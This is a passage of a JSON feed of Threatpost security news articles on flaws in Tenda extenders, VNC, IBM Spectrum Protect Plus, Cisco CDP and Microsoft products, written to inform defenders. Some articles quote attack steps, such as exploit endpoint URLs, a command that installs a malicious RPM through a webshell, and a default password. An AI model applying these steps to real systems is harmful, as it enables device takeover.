today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:39", "description": "A popular Wi-Fi extender for the home has multiple unpatched vulnerabilities, including the use of a weak, default password, according to researchers. Also, two of the bugs could allow complete remote control of the device.\n\nThe flaws have been found in Tenda PA6 Wi-Fi Powerline extender, version 1.0.1.21, which extends the wireless network throughout the house using [HomePlug AV2](<https://en.wikipedia.org/wiki/HomePlug>) technology.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cA compromised device can become part of an internet of things (IoT) botnet that launches distributed denial-of-service (DDoS) attacks, used to pivot to other connected devices, leveraged to mine for cryptocurrency or used in various other unauthorized ways,\u201d explained researchers at IBM X-Force, [in a posting](<https://securityintelligence.com/posts/vulnerable-powerline-extenders-underline-lax-iot-security/>) last week.\n\n## **Web Server Woes**\n\nThe first two bugs are a command-injection issue ([CVE-2019-16213](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172226?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)); and a critical buffer overflow ([CVE-2019-19505](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172228?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)). They are found in the extender device\u2019s web server, under a process named \u201chttpd.\u201d\n\nThe command-injection vulnerability carries a rating of 8.8 out of 10 on the CVSS severity scale. It arises from the fact that under the \u201cPowerline\u201d section in the user interface (UI) of the extender\u2019s web server, the user can see and change the name of the other powerline communication (PLC) devices which are attached to the same powerline network. An authenticated user can inject an arbitrary command just by changing the device name of an attached PLC adapter with a specially crafted string, the researchers noted. Since the web server is running with root privileges, an attacker could leverage this injection to fully compromise the device.\n\n\u201cThe name entered by the user is concatenated as an argument to the \u2018homeplugctl\u2019 application and being executed by the system\u2019 library function,\u201d according to IBM X-Force. \u201cThis user input is just URL decoded, without any validation or sanitation.\u201d\n\nThe second vulnerability is found in the \u201cWireless\u201d section in the web-UI: By adding a device to the Wireless Access Control list with a specially crafted hostname, a remote attacker could overflow a buffer and execute arbitrary code on the system or cause the application to crash. It\u2019s listed as critical, with a 9.8 severity rating.\n\n\u201cIt is possible to overwrite the return address register $ra and begin controlling program execution,\u201d according to the analysis. \u201cA motivated attacker can utilize this to potentially execute arbitrary code. Note that the overflow isn\u2019t a result of an unsafe call to functions like strcpy or memcpy.\u201d\n\n## **Pivoting to a Remote Attack**\n\nBoth bugs are post-authentication \u2013 so a user would need to be signed in to exploit the bugs. But there\u2019s a big caveat to this: The web server itself is password-protected with the default (and very guessable) password \u201cadmin.\u201d\n\n\u201cBoth vulnerabilities in this web-UI allow an authenticated user to compromise the device with root privileges, and while authentication should provide a layer of security, in this case, with a weak and guessable password, it should not be considered adequate protection,\u201d explained the researchers.\n\nSimilarly, the web server interface should only be accessible from the local network \u2013 however, a wrong setup and configuration can expose it to the internet and therefore remote attackers. And, IBM X-Force found that combining these vulnerabilities with a DNS rebinding technique provides the attacker with a remote vector that doesn\u2019t depend on the user\u2019s configuration.\n\n\u201cThat remote attack vector is not far-fetched here, and using a technique called DNS rebinding, we were able to perform the same attack from a remote website, overcoming same-origin limitations by the browser,\u201d said the researchers. \u201cWith this known technique, once the victim is tricked into visiting a malicious website, their entire local network is exposed to the attacker.\u201d\n\nDNS rebinding involves using a malicious JavaScript payload to scan the local network looking for vulnerable powerline extenders. If found, a login could be attempted using a list of popular passwords.\n\n\u201cIn our demo we were able to get a reverse shell on the vulnerable device just by having someone with access to the device\u2019s network visit our website,\u201d said the researchers. This is significant as it allows an attacker to gain control over the vulnerable devices remotely just by having the victim visit a website.\u201d\n\n## **Pre-Auth Denial of Service**\n\nThe third vulnerability ([CVE-2019-19506](<https://exchange.xforce.ibmcloud.com/vulnerabilities/172229?_ga=2.159458491.740009505.1593441219-1535918128.1584710346&cm_mc_uid=31770786977815754792789&cm_mc_sid_50200000=45644951593441218861>)), which rates 7.5 out of 10 on the severity scale, resides in a process named \u201chomeplugd,\u201d which is related to the extender device\u2019s powerline functionality. By sending a specially crafted UDP packet, an attacker could exploit this vulnerability to cause the device to reboot. By causing a recurring reboot, the device will loop through restarts and not be able to carry out its functions or connect to the internet.\n\nUnlike the other two bugs, an attacker in this case would not need to be authenticated.\n\n\u201cAs we were inspecting the open ports and their corresponding services on the extender, we noticed the homeplugd process listening on UDP port 48912,\u201d according to the analysis. \u201cReversing the binary revealed to us that no authentication was required to interact with this service.\u201d\n\n## **Patch Status**\n\nThere are for now no patches for the issues.\n\n\u201cUnfortunately, despite repeated attempts to contact Tenda, IBM is yet to receive any reply to its emails and phone calls,\u201d the researchers said. \u201cIt remains unknown whether the company is working on patches.\u201d\n\nThreatpost has also reached out to the vendor for more information.\n\nTo protect themselves, users should change default passwords on all devices that connect to the internet; update firmware regularly; and use use internal filtering controls or a firewall.\n\n\u201cWhile most flaws in popular software are addressed and patched, devices like powerline extenders, [and even routers](<https://threatpost.com/cisco-ios-xe-flaw-sd-wan-routers/155319/>), do not seem to receive the same treatment, and are all too often left exposed to potential attacks,\u201d the researchers concluded. \u201cBut these devices are not just a connectivity plug on the edge of the network. A critical enough vulnerability can be leveraged to reach other parts of the network. That is especially true for routers, but it also extends to other devices that have some sort of interface into the network.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-29T16:48:17", "type": "threatpost", "title": "Unpatched Wi-Fi Extender Opens Home Networks to Remote Control", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16213", "CVE-2019-19505", "CVE-2019-19506", "CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5135"], "modified": "2020-06-29T16:48:17", "id": "THREATPOST:7FC78356FBFC440CD45BB996E2A8A5C8", "href": "https://threatpost.com/unpatched-wi-fi-extender-remote-control/156990/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:28:33", "description": "The open-source Virtual Network Computing (VNC) project, often found in industrial environments, is plagued with 37 different memory-corruption vulnerabilities \u2013 many of which are critical in severity and some of which could result in remote code execution (RCE). According to researchers at Kaspersky, they potentially affect 600,000 web-accessible servers in systems that use the code.\n\nThe research looked into four popular VNC-based systems, LibVNC, UltraVNC, TightVNC1.X and TurboVNC, which are actively used in automated industrial facilities to enable remote control of systems, according to the firm. Approximately 32 percent of industrial network computers having some form of [remote administration tools](<https://threatpost.com/trickbot-remote-desktop/141879/>), including VNC.\n\n\u201cThe prevalence of such systems in general, and particularly ones that are vulnerable, is a significant issue for the industrial sector as potential damages can bring significant losses through disruption of complex production processes,\u201d Kaspersky researchers wrote in an analysis of the bugs for ICS CERT, [released Friday](<https://ics-cert.kaspersky.com/reports/2019/11/22/vnc-vulnerability-research/>).\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nKasperksy found vulnerabilities not only in the client, but also on the server-side of the system; many of the latter however can only be exploited after password authentication. Across all 37 bugs, there are two main attack vectors, the firm said: \u201cAn attacker is on the same network with the VNC server and attacks it to gain the ability to execute code on the server with the server\u2019s privileges; [or] a user connects to an attacker\u2019s \u2018server\u2019 using a VNC client and the attacker exploits vulnerabilities in the client to attack the user and execute code on the user\u2019s machine.\u201d\n\nA significant number of the problems detailed in the research were found and reported last year; however, each of the projects examined also had newly discovered bugs.\n\nFor instance, a newly found critical (9.8 out of 10 on the CVSS v.3 severity rating scale) database stack buffer overflow vulnerability in the TurboVNC server code could result in RCE. The issue ([CVE-2019-15683](<https://nvd.nist.gov/vuln/detail/CVE-2019-15683>)) exists because the stack frame is not protected with a stack canary. However, to exploit the bug, authorization on the server is required.\n\n\u201cSome compilers perform\u2026optimizations by removing stack canary checks from the functions that don\u2019t have explicitly allocated arrays,\u201d according to the research. \u201cHowever, the compiler could make a mistake and fail to check for the presence of a buffer in some of the structures on the stack or in switch-case statements.\u201d\n\nAlso, a critical integer-overflow vulnerability ([CVE-2018-15361](<https://nvd.nist.gov/vuln/detail/CVE-2018-15361>)) exists in UltraVNC client-side code. This is also critical, with a CVSS rating of 9.8 out of 10, and can be exploited to cause a denial-of-service state. Researchers also \u201cwouldn\u2019t rule out that experts in exploiting the Windows userland heap could turn this vulnerability into an RCE if they wanted to.\u201d\n\n\u201cIf an integer overflow occurs when allocating m_desktopName and the buffer is allocated on the regular heap of the process, this will make it possible to write the null byte to the previous chunk,\u201d according to the research. \u201cIf an integer overflow does not occur and the system has sufficient memory, a large buffer will be allocated, with a new heap allocated for it. With the right parameters, a remote attacker would be able to write a null byte to the _NT_HEAP structure, which will be located directly before a huge chunk.\u201d\n\nMeanwhile, the [CVE-2019-8262](<https://nvd.nist.gov/vuln/detail/CVE-2019-8262>) critical vulnerability (with a CVSS score of 9.8 out of 10) was identified in the handler of data encoded using the UltraVNC encoding function that could cause information disclosure.\n\n\u201cThe uninitialized variable new_len is passed to the lzo1x_decompress function,\u201d according to the research. \u201cAt the time of calling the function, the variable should be equal to the length of the m_zlibbuf buffer\u2026since the variable new_len was not initialized, it contained a large text section address value. This made it possible for a remote user to pass specially crafted data to the decompression function as inputs to ensure that the function, when writing to the m_zlibbuf buffer, would write the data beyond the buffer\u2019s boundary, resulting in heap overflow.\u201d\n\nIn TightVNC code version 1.3.10, there\u2019s a critical global buffer overflow ([CVE-2019-8287](<https://nvd.nist.gov/vuln/detail/CVE-2019-8287#vulnCurrentDescriptionTitle>)) in HandleCoRREBBP macro function, also with a CVSS rating of 9.8 out of 10. This can also potentially result RCE, Kaspersky found.\n\nResearchers also recently found a high-severity flaw in LibVNC ([CVE-2019-15681](<https://nvd.nist.gov/vuln/detail/CVE-2019-15681>)), with a CVSS rating of 7.7 out of 10. It involves a memory leak exploitable via network connectivity in the VNC server code, which allows an attacker to read stack memory and can be abused for information disclosure. According to the advisory, combined with another vulnerability, it can be used to leak stack memory and bypass ASLR.\n\nWorryingly, some of the bugs had been incorporated into the VNC code for years, meaning that projects built on it have \u201cinherited\u201d the issues.\n\n\u201cI was surprised to see the simplicity of discovered vulnerabilities, especially considering their significant lifetime,\u201d said Pavel Cheremushkin, Kaspersky ICS CERT vulnerability researcher, in a media statement. \u201cThis means that attackers could have noticed and taken advantage of the vulnerabilities a long time ago. Moreover, some classes of vulnerabilities are present in many open-source projects and remain there even after refactoring of the [main] codebase.\u201d\n\nKaspersky contacted the affected developers, and patches have been issued for supported products, it said. TightVNC for instance has discontinued the development of the TightVNC 1.X line and considers it end of life, so the bugs won\u2019t be patched.\n\n_**Is MFA enough to protect modern enterprises in the peak era of data breaches? How can you truly secure consumer accounts? Prevent account takeover? Find out: Catch our free, on-demand **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**, \u201cTrends in Fortune 1000 Breach Exposure\u201d to hear advice from breach expert Chip Witt of SpyCloud. **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=post>)_**.**_\n", "cvss3": {}, "published": "2019-11-22T19:50:14", "type": "threatpost", "title": "Critical Flaws in VNC Threaten Industrial Environments", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-15361", "CVE-2019-15681", "CVE-2019-15683", "CVE-2019-8262", "CVE-2019-8287", "CVE-2020-5135"], "modified": "2019-11-22T19:50:14", "id": "THREATPOST:8F6E27B46891F0167D7799A73F1A9380", "href": "https://threatpost.com/critical-flaws-vnc-industrial/150568/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:13:56", "description": "IBM has issued fixes for vulnerabilities in Spectrum Protect Plus, Big Blue\u2019s security tool found under the umbrella of its Spectrum data storage software branding. The flaws can be exploited by remote attackers to execute code on vulnerable systems.\n\nIBM Spectrum Protect Plus is a data-protection solution that provides near-instant recovery, replication, reuse and self-service for virtual machines. The vulnerabilities (CVE-2020-4703 and CVE-2020-4711) affect versions 10.1.0 through 10.1.6 of IBM Spectrum Protect Plus.\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to Register\n\nThe more serious of the two flaws (CVE-2020-4703) exists in IBM Spectrum Protect Plus\u2019 Administrative Console and could allow an authenticated attacker to upload arbitrary files \u2013 which could then be used to execute arbitrary code on the vulnerable server, according to researchers with Tenable, who discovered the flaws, [in a Monday advisory](<https://www.tenable.com/security/research/tra-2020-54>). The bug ranks 8 out of 10 on the CVSS scale, making it high-severity.\n\nThis vulnerability is due to an incomplete fix for CVE-2020-4470, a high-severity flaw [that was previously disclosed in June](<https://nvd.nist.gov/vuln/detail/CVE-2020-4470>). An exploit for CVE-2020-4470 involves two operations, Tenable researchers said: \u201cThe first operation is to upload a malicious RPM package to a directory writable by the administrator account by sending an HTTP POST message to URL endpoint https://<spp_host>:8090/api/plugin,\u201d they said. \u201cThe second operation is to install the malicious RPM by sending an HTTP POST message to URL endpoint http://<spp_host>:8090/emi/api/hotfix.\u201d\n\nBut IBM\u2019s ensuing fix for CVE-2020-4470 only addressed the second operation by enforcing authentication for the /emi/api/hotfix endpoint. Researchers found, it was still possible to upload unauthenticated arbitrary files to a directory writable by the administrator account, under which the endpoint handlers run \u2013 paving the way for code execution on vulnerable systems.\n\n\u201cThe attacker can put malicious content (i.e., scriptlets) in the RPM and and issue a \u2018sudo /bin/rpm -ivh /tmp/<uploaded_malicious_rpm>\u2019 command to the webshell, achieving unauthenticated RCE as root,\u201d said researchers.\n\nThe second flaw, CVE-2020-4711, exists in a script (/opt/ECX/tools/scripts/restore_wrapper.sh) within Spectrum Protect Plus. A directory path check within this function can be bypassed via path traversal. An unauthenticated, remote attacker can exploit this issue by sending a specially crafted HTTP request to a specially-crafted URL endpoint (https://<spp_host>:8090/catalogmanager/api/catalog), Tenable researchers said.\n\nThat endpoint doesn\u2019t require any authentication (when the cmode parameter is the restorefromjob method). When the request has been sent, the endpoint handler instead calls a method (com.catalogic.ecx.catalogmanager.domain.CatalogManagerServiceImpl.restoreFromJob) without checking for user credentials. The restoreFromJob method then executes the /opt/ECX/tools/scripts/restore_wrapper.sh script as root \u2013 allowing the attacker to view arbitrary files on the system.\n\nTenable researchers discovered the flaws on July 31 and reported them to IBM on Aug. 18. IBM released the patches and an advisory disclosing the flaws on Monday. Threatpost has reached out to IBM for further comment.\n\nIn recent months, various IBM products have been found to have security vulnerabilities. In August, a shared-memory flaw was discovered in [IBM\u2019s next-gen data-management software](<https://threatpost.com/ibm-ai-powered-data-management-software-subject-exploit/158497/>) that researchers said could lead to other threats \u2014 as demonstrated by a new proof-of-concept exploit for the bug.\n\nAnd in April, four serious security vulnerabilities in [the IBM Data Risk Manager](<https://threatpost.com/rce-exploit-ibm-data-risk-manager-no-patch/154986/>) (IDRM) were identified that can lead to unauthenticated remote code execution (RCE) as root in vulnerable versions, according to analysis \u2013 and a proof-of-concept exploit is available.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-15T19:08:13", "type": "threatpost", "title": "IBM Spectrum Protect Plus Security Open to RCE", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-4470", "CVE-2020-4703", "CVE-2020-4711", "CVE-2020-5135"], "modified": "2020-09-15T19:08:13", "id": "THREATPOST:033645C929899D29D91092278D188D8E", "href": "https://threatpost.com/ibm-flaws-spectrum-protect-plus/159268/", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:25:10", "description": "Cisco is issuing patches for five critical vulnerabilities that have been discovered in Cisco Discovery Protocol (CDP), the info-sharing layer that maps all Cisco equipment on a network.\n\nResearchers at Armis say that the vulnerabilities, which they disclosed on Wednesday and collectively dubbed CDPwn, can allow attackers with an existing foothold in the network to break through network segmentation efforts and remotely take over millions of devices.\n\nCDP is a Cisco proprietary Layer 2 network protocol that is used to discover information about locally attached Cisco equipment. CDP aids in mapping the presence of other Cisco products in the network and is implemented in virtually all Cisco products \u2013 including switches, routers, IP phones and IP cameras. Many of these devices cannot work properly without CDP, and do not offer the ability to turn it off, according to researchers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe flaws specifically exist in the parsing of CDP packets, within the protocol\u2019s implementation in various Cisco products, from its IOS XR software to IP cameras. Cisco issued patches on Wednesday addressing the five flaws, and is urging users to update as soon as possible.\n\n\u201cThere are endless types of Layer 2 protocols, and CDP is one of them,\u201d Ben Seri, vice president of research at Armis, told Threatpost. \u201cBut there is actually a very large attack surface there, which has been neglected. I think the research community needs to do more in looking at these protocols. And network segmentation, at the end of the day, is a strong solution for IoT [internet of things], and other security problems are solved by it, but we need to make sure that it really stands strong against all kinds of attacks.\u201d\n\nA Cisco spokesperson told Threatpost that Cisco is not aware of any \u201cmalicious uses\u201d of the flaws in the wild.\n\n\u201cTransparency at Cisco is a matter of top priority,\u201d the spokesperson told Threatpost. \u201cWhen security issues arise, we handle them openly and swiftly, so our customers understand the issue and how to address it. On Feb. 5, we disclosed vulnerabilities in the Cisco Discovery Protocol implementation of several Cisco products along with software fix information and mitigations, where available.\u201d\n\n## The Flaws\n\nThe attack comes with a caveat: It requires the attacker to already have some sort of foothold inside the network, via a previously compromised Cisco device, Seri told Threatpost.\n\n\u201cSo it\u2019s not an attack that necessarily is coming from the internet,\u201d Seri told Threatpost. \u201cThe attacker needs to have some access, but if you have some very low-grade IoT device sitting inside the network, part of your threat model already is that these devices might be compromised.\u201d\n\nAfter compromising a vulnerable Cisco device, an attacker could then send a maliciously crafted CDP packet to another Cisco device located inside the network. There are five vulnerabilities in all \u2014 four of which are critical remote code-execution (RCE) vulnerabilities, and one is a denial-of Service (DoS) vulnerability.\n\nThe first RCE flaw ([CVE-2020-3118](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-iosxr-cdp-rce>)) is a format string flaw in the parsing of certain fields (i.e. Device ID) for incoming CDP packets in the CDP implementation for Cisco\u2019s Internetworking Operating System (IOS XR). IOS XR is used for its Network Converging System (NCS) carrier-grade routers.\n\nAn attacker could use certain format string characters to cause a stack overflow, ultimately leading to RCE. Researchers said an attacker could exploit this flaw to \u201cgain full control over the target router to traverse between network segments and use the router for subsequent attacks.\u201d\n\nThe second RCE flaw ([CVE-2020-3119](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-nxos-cdp-rce>)) is a stack-overflow vulnerability that stems from the parsing of CDP packets in Cisco NX-OS, a network operating system for Cisco\u2019s Nexus-series Ethernet switches and MDS-series Fibre Channel storage area network switches. An attacker can exploit this flaw using a legitimate CDP packet with skewed power levels (i.e., above the power level that can be accepted) and cause a stack overflow on switches, thus gaining full control.\n\nAnother RCE flaw is a heap overflow ([CVE-2020-3110](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-ipcameras-rce-dos>)) that exists in the parsing of CDP packets in the CDP implementation for Cisco Video Surveillance 8000 Series IP Cameras. It\u2019s caused when an attacker sends a CDP packet with an \u201coverly large Port ID field.\u201d\n\nThe final RCE flaw exists in the CDP implementation on Cisco Voice Over IP Phones ([CVE-2020-3111](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-voip-phones-rce-dos>)). \u201cIn this vulnerability, a stack overflow in the parsing function for the Port ID, can be exploited to gain code execution on the phone,\u201d researchers said.\n\nThe DoS flaw meanwhile stems from the CDP implementation in Cisco FXOS, IOS XR and NX-OS software ([CVE-2020-3120](<https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20200205-fxnxos-iosxr-cdp-dos>)), which can be exploited by making the CDP daemon of a router or switch allocate large blocks of memory, causing the process to crash.\n\n\u201cWith this vulnerability, an attacker can cause the CDP process to crash repeatedly, which in turn causes the router to reboot,\u201d said researchers. \u201cThis means that an attacker can use this vulnerability to create a complete DoS of the target router, and in turn, completely disrupt target networks.\u201d\n\n## Impact\n\nOnce these flaws have been exploited, a bad actor could launch an array of attacks \u2013 including exfiltrating data of corporate network traffic traversing through an organization\u2019s switches and routers; and viewing sensitive information such as phone calls from IP phones and video feeds from IP cameras.\n\nAttackers could also gain access to additional devices by leveraging man-in-the-middle attacks, which would allow them to intercept and alter traffic on corporate switches.\n\nArmis disclosed the vulnerabilities to Cisco on Aug. 29, and said that it has worked with the networking giant since then to develop and test mitigations and patches. The patches were released Wednesday.\n\n\u201cVulnerabilities that allow an attacker to break through network segmentation and move freely across the network pose a tremendous threat to enterprises,\u201d according to Armis researchers. \u201cTargets have moved beyond traditional desktops, laptops and servers to devices like IP phones and cameras which contain valuable voice and video data. Current security measures, including endpoint protection, mobile device management, firewalls and network security solutions are not designed to identify these types of attacks.\u201d\n\n_**Learn how Operational Technology and Information Technology systems are merging and changing security playbooks in this free Threatpost Webinar. Join us [Wednesday, Feb. 19 at 2 p.m. ET](<https://attendee.gotowebinar.com/register/2652328115100076035?source=art>) when a panel of OT and IT security experts will discuss how this growing trend is shaping security approaches for IoT and 5G rollouts. This webinar is for security and DevOps engineers, IoT edge developers and security executives.**_\n", "cvss3": {}, "published": "2020-02-05T16:00:41", "type": "threatpost", "title": "Critical Cisco \u2018CDPwn\u2019 Flaws Affect Millions of Devices", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-3110", "CVE-2020-3111", "CVE-2020-3118", "CVE-2020-3119", "CVE-2020-3120", "CVE-2020-5135"], "modified": "2020-02-05T16:00:41", "id": "THREATPOST:32F51D65448FD7613BA513B6F8239EE9", "href": "https://threatpost.com/critical-cisco-cdpwn-flaws-network-segmentation/152546/", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:27:41", "description": "Microsoft tackled 115 bug fixes as part of its March Patch Tuesday update \u2013 26 rated critical and 88 rated medium severity. The bugs patched span its product catalog, from Azure DevOps to Windows 10.\n\nThis month\u2019s haul is notable in its quantity and that there are only a few stand-out bugs causing headaches for system administrators. Unlike [last month](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>), Microsoft did not report that any of its bugs were publicly known or under attack at the time it released its bulletin.\n\nWithin the mix of critical issues, Microsoft tacked three remote code execution vulnerabilities. Two are tied to Internet Explorer (CVE-2020-0833, CVE-2020-0824) and the third (CVE-2020-0847) to the VBscript scripting language used by Microsoft.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAs for the two bugs in IE, researchers warned that either one could lead to code execution only if the victim was logged in with administrative rights.\n\n\u201cThe vulnerabilities could corrupt memory allowing an attacker to execute arbitrary code in the context of the current user,\u201d wrote Jay Goodman, strategic product marketing at Automox, via email. \u201cWhat this means is that an attacker could run malicious code directly on the user\u2019s system. If the user is logged in with administrative rights, those rights would extend to the code.\u201d\n\nAs for the VBscript bug, the researcher said, if an attacker was successful in commandeering the tool via code execution, it would allow an adversary to have sysadmin-like powers. That would allow them to run scripts and leverage software tools to control connected endpoints. \u201c[It] will give the user complete control over many aspects of the device,\u201d Melick said.\n\nAs for the other critical bugs, 17 fixes are tied to Microsoft\u2019s browser and scripting engines, four are for Media Foundation, two are for GDI+ and the remaining three address potentially dangerous LNK files and Microsoft Word and Dynamics Business, points out Animesh Jain with Qualys\u2019 Patch Tuesday team.\n\nJain also singled out another remote code-execution vulnerability (CVE-2020-0852), this time in Microsoft Word. \u201cAn attacker could exploit the vulnerability using a specially crafted file to perform actions on behalf of the logged-in user with the same permissions as the current user,\u201d he noted.\n\nTodd Schell, senior product manager for security at Ivanti, pointed out that the Word issue \u201ccould be exploited through the Preview Pane in Outlook, making it a more interesting target for threat actors.\u201d\n\nHe also noted that Microsoft announced a vulnerability in its Remote Desktop Connection Manager (CVE-2020-0765) that the software giant said it won\u2019t fix. \u201cThey do not plan to release an update to fix the issue,\u201d he said in a prepared statement. \u201cThe product has been deprecated. Their guidance is to use caution if you continue to use RDCMan, but recommends moving to supported Remote Desktop clients.\u201d\n\nThis month Microsoft offered its usual perfunctory advice:\n\n\u201cApply appropriate patches or appropriate mitigations provided by Microsoft to vulnerable systems immediately after appropriate testing. Run all software as a non-privileged user (one without administrative rights) to diminish the effects of a successful attack,\u201d it wrote. Besides suggesting to users not to visit untrusted sites or click on suspect links, it recommends, \u201capply the principle of least privilege to all systems and services.\u201d\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n", "cvss3": {}, "published": "2020-03-10T21:19:39", "type": "threatpost", "title": "Microsoft Patches 26 Critical Bugs in Big March Update", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0765", "CVE-2020-0824", "CVE-2020-0833", "CVE-2020-0847", "CVE-2020-0852", "CVE-2020-5135"], "modified": "2020-03-10T21:19:39", "id": "THREATPOST:58C865E4F2AA34CD62938A2E6BBFDE44", "href": "https://threatpost.com/microsoft-patches-bugs-march-update/153597/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, 